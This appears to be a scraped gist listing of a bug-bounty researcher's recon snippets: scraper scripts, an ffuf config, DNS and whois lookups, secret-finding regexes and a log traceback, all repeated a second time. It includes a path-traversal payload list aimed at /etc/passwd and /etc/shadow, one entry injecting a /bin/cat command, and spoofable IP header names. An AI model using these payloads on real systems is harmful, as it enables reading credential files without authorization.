Felipe Caon felipecaon

## axiom_rule_httpx.json
{
"builders": [],
"provisioners": [
{
"type": "file",
"source": "./configs",
"destination": "/tmp/configs"
},
{
"execute_command": "chmod +x {{ .Path }}; {{ .Vars }} sudo -E sh '{{ .Path }}'",

## alienvaultscraper.py
import argparse
import requests

# Define the API endpoint and parameters

base_url = "https://otx.alienvault.com/api/v1/indicators/domain/{domain}/url_list?limit=500&page={page}"
current_domain = ""

def make_request(domain, page):
    while True:

## The great LFI list
/.../.../.../.../.../
\…..\\\…..\\\…..\\\
%00../../../../../../etc/passwd
%00/etc/passwd%00
%00../../../../../../etc/shadow
%00/etc/shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%  25%5c..%25%5c..%00

## .ffufrc
[general]
  colors = true

[http]
    headers = [
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"
    ]

[https]
    headers = [

## httpheaders.txt
Client-IP
Forwarded-For-Ip
Forwarded-For
Forwarded
True-Client-IP
X-Client-IP
X-Custom-IP-Authorization
X-Forward-For
X-Forward
X-Forwarded-By

## pathtransversal
| Char | Encoded |
| --- | --- |
| space | %20 |
| / | %2f |
| \ | %5c |
| % | %25 |
| . | %2e |
| f | %66 |
| e | %65 |

## gist:e2f4de862fefbd7b46db51387671bc97
[2023-02-12 23:37:14,576: ERROR/ForkPoolWorker-2] Task recon.run_recon[9d1aac1c-10f6-4379-89db-e8415d685947] raised unexpected: TimeoutError('Function exceeded maximum time of 175 seconds and was killed')
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/celery/app/trace.py", line 451, in trace_task
    R = retval = fun(*args, **kwargs)
  File "/usr/local/lib/python3.8/site-packages/celery/app/trace.py", line 734, in __protected_call__
    return self.run(*args, **kwargs)
  File "/usr/app/worker/worker_app.py", line 118, in recon_run_recon
    fexec.get_result()
  File "/usr/local/lib/python3.8/site-packages/lithops/executors.py", line 499, in get_result
    fs_done, _ = self.wait(

## ns check
import socket
import dns.resolver


with open('domainlist.txt') as f:
    domain_list = [line.strip() for line in f.readlines()]

for domain in domain_list:
    resolver = dns.resolver.Resolver()
    nameservers = resolver.query(domain, 'NS')

## whoxt_script.py
import requests

apikey = ""

page = 1
url = f"https://api.whoxy.com/?key={apikey}&reverse=whois&identifier=filter&mode=micro&page={page}"

response = requests.get(url)

file_path = 'company.txt'

## jsluice_rules.json
[
    {
        "name": "ADMIN_PASSWORD",
        "value": "(admin).+(secret|token|key|password).+"
    },
    {
        "name": "AWS API Gateway",
        "value": "[0-9a-z]+.execute-api.[0-9a-z.-_]+.amazonaws.com"
    },
    {
	{
	"builders": [],
	"provisioners": [
	{
	"type": "file",
	"source": "./configs",
	"destination": "/tmp/configs"
	},
	{
	"execute_command": "chmod +x {{ .Path }}; {{ .Vars }} sudo -E sh '{{ .Path }}'",
	import argparse
	import requests

	# Define the API endpoint and parameters

	base_url = "https://otx.alienvault.com/api/v1/indicators/domain/{domain}/url_list?limit=500&page={page}"
	current_domain = ""

	def make_request(domain, page):
	while True:
	/.../.../.../.../.../
	\…..\\\…..\\\…..\\\
	%00../../../../../../etc/passwd
	%00/etc/passwd%00
	%00../../../../../../etc/shadow
	%00/etc/shadow%00
	%0a/bin/cat%20/etc/passwd
	%0a/bin/cat%20/etc/shadow
	/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
	%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
	[general]
	colors = true

	[http]
	headers = [
	"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"
	]

	[https]
	headers = [
	Client-IP
	Forwarded-For-Ip
	Forwarded-For
	Forwarded
	True-Client-IP
	X-Client-IP
	X-Custom-IP-Authorization
	X-Forward-For
	X-Forward
	X-Forwarded-By
	\| Char \| Encoded \|
	\| --- \| --- \|
	\| space \| %20 \|
	\| / \| %2f \|
	\| \ \| %5c \|
	\| % \| %25 \|
	\| . \| %2e \|
	\| f \| %66 \|
	\| e \| %65 \|
	[2023-02-12 23:37:14,576: ERROR/ForkPoolWorker-2] Task recon.run_recon[9d1aac1c-10f6-4379-89db-e8415d685947] raised unexpected: TimeoutError('Function exceeded maximum time of 175 seconds and was killed')
	Traceback (most recent call last):
	File "/usr/local/lib/python3.8/site-packages/celery/app/trace.py", line 451, in trace_task
	R = retval = fun(args, *kwargs)
	File "/usr/local/lib/python3.8/site-packages/celery/app/trace.py", line 734, in __protected_call__
	return self.run(args, *kwargs)
	File "/usr/app/worker/worker_app.py", line 118, in recon_run_recon
	fexec.get_result()
	File "/usr/local/lib/python3.8/site-packages/lithops/executors.py", line 499, in get_result
	fs_done, _ = self.wait(
	import socket
	import dns.resolver


	with open('domainlist.txt') as f:
	domain_list = [line.strip() for line in f.readlines()]

	for domain in domain_list:
	resolver = dns.resolver.Resolver()
	nameservers = resolver.query(domain, 'NS')
	import requests

	apikey = ""

	page = 1
	url = f"https://api.whoxy.com/?key={apikey}&reverse=whois&identifier=filter&mode=micro&page={page}"

	response = requests.get(url)

	file_path = 'company.txt'
	[
	{
	"name": "ADMIN_PASSWORD",
	"value": "(admin).+(secret\|token\|key\|password).+"
	},
	{
	"name": "AWS API Gateway",
	"value": "[0-9a-z]+.execute-api.[0-9a-z.-_]+.amazonaws.com"
	},
	{